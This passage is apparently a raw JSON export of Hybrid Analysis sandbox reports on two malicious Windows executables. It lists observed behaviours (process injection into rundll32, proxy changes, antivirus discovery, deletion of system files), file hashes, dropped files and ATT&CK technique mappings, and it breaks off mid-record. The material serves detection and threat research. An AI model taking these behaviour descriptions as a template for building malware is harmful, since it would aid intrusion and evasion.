\"Process32NextW with parameter System\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-61", "type": 2, "relevance": 10, "name": "Found an instant messenger related domain", "description": "\"hotwire.com\" (Indicator: \"wire.com\")\n \"blackberry.com\" (Indicator: \"blackberry.com\")", "origin": "File/Memory"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "stream-131", "type": 1, "relevance": 5, "name": "Contains ability to retrieve the fully qualified path of module", "description": "GetModuleFileNameA@KERNEL32.dll at 39956-109-00405440\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00006120-43002-45-00407100\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00006120-43002-38-00405440", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"rundll32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\IEXPLORE.EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\IEXPLORE .EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\internat.exe\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\IEXPLORE.EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\IEXPLORE .EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\mssysint.exe\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\mspsint.exe\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\mspbint.exe\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\mspbbase.dll\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\mspbhook.dll\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\psinthk.dll\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\psintbs.dll\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\¢®.exe\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\notepad¢®.exe\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\¢«.exe\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\system32\\notepad¢¬.exe\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\INTERNAT.EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\System32\\IEXPLORE.EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\System32\\IEXPLORE .EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\System32\\MSSYSINT.EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\System32\\MSPSINT.EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\System32\\MSPBINT.EXE\" with delete access\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"C:\\Windows\\System32\\MSPBBASE.DLL\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-120", "type": 6, "relevance": 10, "name": "Calls an API typically used to run the specified application", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"WinExec\" with parameter %WINDIR%\\system\\rundll32.exe (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" wrote 1500 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" allocated memory in \"C:\\fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-32", "type": 3, "relevance": 8, "name": "Reads Antivirus engine related registry keys", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ\")", "origin": "Registry Access", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"rundll32.exe\" connects to <IPv4>:80", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-248", "type": 9, "relevance": 6, "name": "Detected Rundll32 execution with no parameters provided (likely process injection)", "description": "Process \"rundll32.exe\" with commandline \"\" [UID: 00000000-00005596]", "origin": "Monitored Target", "attck_id": "T1218.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/008"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9
https://hybrid-analysis.com/sample/7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9
Hybrid Analysis - Infostealers
{"size": 72544, "type": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "submit_name": "7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9", "sha256": "7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9", "av_detect": 93, "vx_family": "Malware.SF.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "total_processes": 3, "total_signatures": 136, "extracted_files": [{"name": "microsofthelp.exe", "file_path": "%WINDIR%\\microsofthelp.exe", "file_size": 72804, "sha256": "46ddd558b8545dd3f872a3c72a916d50d40da13dcaa5a49e57a8ac542433cac0", "type_tags": ["neexe", "executable"], "description": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "runtime_process": "7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe (PID: 5932)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "microsofthelp.exe.bin", "file_size": 72804, "sha256": "46ddd558b8545dd3f872a3c72a916d50d40da13dcaa5a49e57a8ac542433cac0", "type_tags": ["neexe", "executable"], "description": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279749, "sha256": "eb6d534199aa0908b40b6ab5f152d90284757b6b557f08041de7e96f11e53e74", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A480BA.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MICROSOFTHELP.EXE.67A47CFC.bin", "file_size": 72804, "sha256": "46ddd558b8545dd3f872a3c72a916d50d40da13dcaa5a49e57a8ac542433cac0", "type_tags": ["neexe", "executable"], "description": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005932", "name": "7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe", "normalized_path": "C:\\7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe", "sha256": "7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9"}, {"uid": "00000000-00005968", "parentuid": "00000000-00005932", "name": "microsofthelp.exe", "normalized_path": "%WINDIR%\\microsofthelp.exe", "sha256": "46ddd558b8545dd3f872a3c72a916d50d40da13dcaa5a49e57a8ac542433cac0"}, {"uid": "00000000-00001432", "name": "microsofthelp.exe", "normalized_path": "%WINDIR%\\microsofthelp.exe", "sha256": "46ddd558b8545dd3f872a3c72a916d50d40da13dcaa5a49e57a8ac542433cac0"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": 